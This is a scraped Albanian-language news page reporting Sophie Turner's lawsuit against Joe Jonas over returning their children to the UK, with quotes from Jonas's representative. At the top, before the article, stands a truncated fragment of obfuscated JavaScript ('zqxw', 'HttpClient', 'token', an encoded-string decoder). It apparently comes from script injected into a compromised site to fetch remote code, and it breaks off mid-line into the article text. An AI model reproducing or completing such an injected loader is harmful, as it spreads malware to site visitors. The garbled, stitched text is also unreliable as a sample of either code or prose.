;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pse Sophie Turner paditi Joe Jonas?

By

Sophie Turner ka paditur Joe Jonasin për kthimin e dy fëmijëve të tyre të vegjël në Mbretërinë e Bashkuar.

Dokumentet e gjykatës pretendojnë se këngëtari i grupit Jonas Brothers, i cili paraqiti kërkesën për divorc në fillim të këtij muaji, po refuzon të dorëzojë pasaportat e fëmijëve.

Jonas, ndërkohë, i ka kërkuar Turnerit që të “rishqyrtojë pozicionin e saj të ashpër ligjor dhe të ecë përpara në një mënyrë më konstruktive dhe private”.

“Shqetësimi i tij i vetëm është mirëqenia e fëmijëve të tij”, tha përfaqësuesi i tij, raporton Skynews, transmeton Klan Kosova.

Deklarata e tij dënoi gjithashtu përdorimin e gjuhës si “rrëmbimi” duke e quajtur atë “mashtruese në rastin më të mirë dhe një abuzim serioz të sistemit ligjor në rastin më të keq”.

“Fëmijët nuk janë rrëmbyer”, thuhet në deklaratë. “Sophie po e bën këtë pretendim vetëm për të zhvendosur procedurat e divorcit në Mbretërinë e Bashkuar dhe për të larguar fëmijët nga ShBA-ja përgjithmonë”.

Artikuj të ngjashëm